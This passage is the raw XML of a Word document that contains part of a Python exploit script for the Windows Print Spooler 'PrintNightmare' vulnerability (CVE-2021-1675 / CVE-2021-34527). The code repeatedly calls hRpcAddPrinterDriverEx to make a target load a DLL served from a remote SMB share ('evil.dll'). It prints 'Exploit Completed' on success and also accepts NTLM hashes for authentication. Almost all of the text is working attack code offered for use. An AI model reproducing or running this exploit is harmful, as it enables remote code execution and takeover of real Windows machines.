        <w:t>rprn.APD_COPY_ALL_FILES</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> | 0x10 | 0x8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDBA5E2" w14:textId="0CB72A8A" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">filename = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>share.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>("\\")[-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477C6C4" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="521103C0" w14:textId="56A026A9" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">resp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rprn.hRpcAddPrinterDriverEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">=handle, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pDriverContainer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>container_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dwFileCopyFlags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>=flags)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C9BF94" w14:textId="4B0F0235" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>print("[*] Stage0: {0}".format(resp['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>ErrorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C78102" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="77AD0775" w14:textId="62331B33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pConfigFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']  = "C:\\Windows\\System32\\kernelbase.dll\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44041C9F" w14:textId="7DE3DF27" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> in range(1, 30):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCAE92F" w14:textId="3883F4D6" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F609FB8" w14:textId="19948E9F" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>container_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>DriverInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']['Level2']['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pConfigFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DC2231" w14:textId="0CF08894" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">resp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>rprn.hRpcAddPrinterDriverEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">=handle, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pDriverContainer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>container_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dwFileCopyFlags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>=flags)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3018B587" w14:textId="7DACF246" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>print("[*] Stage{0}: {1}".format(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>, resp['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>ErrorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF8BC1B" w14:textId="4B7E8B32" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>if (resp['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>ErrorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>'] == 0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67553D42" w14:textId="78F2E739" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>print("[+] Exploit Completed")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1C0AEE" w14:textId="1FBF408D" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADC3343" w14:textId="41B39F40" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA77346" w14:textId="556A0951" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>#print(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE077D" w14:textId="36CA5DB8" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5272360D" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="0290834B" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="7D097D4E" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701907DB" w14:textId="369EFA4D" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">parser = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>argparse.ArgumentParser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>add_help</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = True, description = "MS-RPRN PrintNightmare CVE-2021-1675 / CVE-2021-34527 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4F4A55" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:lastRenderedPageBreak/>
        <w:t>Example;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7BE35666" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">./CVE-2021-1675.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>hackit.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>\\addCube.dll'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7677BF" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">./CVE-2021-1675.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>hackit.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADCBB6B" w14:textId="7A5B4A4F" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310EDA54" w14:textId="3DE4BB32" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>parser.add_argument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('target', action='store', help='[[domain/]username[:password]@]&lt;targetName or address&gt;')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA9612" w14:textId="4017FF77" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>parser.add_argument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BBE3F0" w14:textId="0E4D1CD9" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>parser.add_argument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>nargs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>="?")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18245F42" w14:textId="1AD6558B" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">group = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>parser.add_argument_group</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('authentication')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46671E20" w14:textId="63CD8970" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>group.add_argument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">('-hashes', action="store", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>metavar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB7F79" w14:textId="37798555" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">group = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>parser.add_argument_group</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('connection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57563A98" w14:textId="32259B18" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>group.add_argument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('-target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">', action='store', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>metavar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> address",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2212B9F4" w14:textId="7A831164" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>help='IP Address of the target machine. If omitted it will use whatever was specified as target. '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43748C39" w14:textId="5675E5DA" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>'This is useful when target is the NetBIOS name and you cannot resolve it')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69344497" w14:textId="269067F6" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>group.add_argument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">('-port', choices=['139', '445'], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>nargs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">='?', default='445', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>metavar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>="destination port",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1538458D" w14:textId="44F4CE24" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>help='Destination port to connect to SMB Server')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD0ECE5" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="2C1CC949" w14:textId="66753F7C" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>sys.argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>)==1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6762C2EB" w14:textId="29D1B7E3" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>parser.print_help</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DCA390" w14:textId="7C2D7251" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:lastRenderedPageBreak/>
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757B9E41" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="227326BD" w14:textId="703CF2F3" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">options = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>parser.parse_args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A1F5B4" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="7E5BDA72" w14:textId="4F3B2527" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D84260" w14:textId="03A3AB25" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">domain, username, password, address = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>re.compile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(?:(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>:([</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>^/@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>:]*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>)/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>)?(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>[^@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>:]*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(?::([</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>^</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>@]*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>)?@)?(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>.*)'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>).match</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(</w:t>
      </w:r>
    </w:p>
